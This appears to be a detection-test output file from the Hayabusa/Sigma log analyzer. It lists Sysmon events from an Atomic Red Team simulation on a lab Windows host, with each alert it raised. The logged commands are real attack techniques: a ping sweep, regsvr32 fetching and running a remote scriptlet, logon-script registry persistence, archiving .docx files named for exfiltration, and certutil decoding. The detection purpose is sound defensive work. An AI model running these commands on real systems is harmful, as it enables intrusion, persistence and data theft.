+2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.245  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.246  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.247  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.248  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.249  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.250  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.251  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.252  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.253  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.254  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp  -a  :  Path: C:\Windows\System32\ARP.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c  IF %%PROCESSOR_ARCHITECTURE%% ==AMD64  ELSE    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command:  /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,-
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe  ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d  cmd.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -encode c:\file.exe file.txt  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -decode file.txt c:\file.exe  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
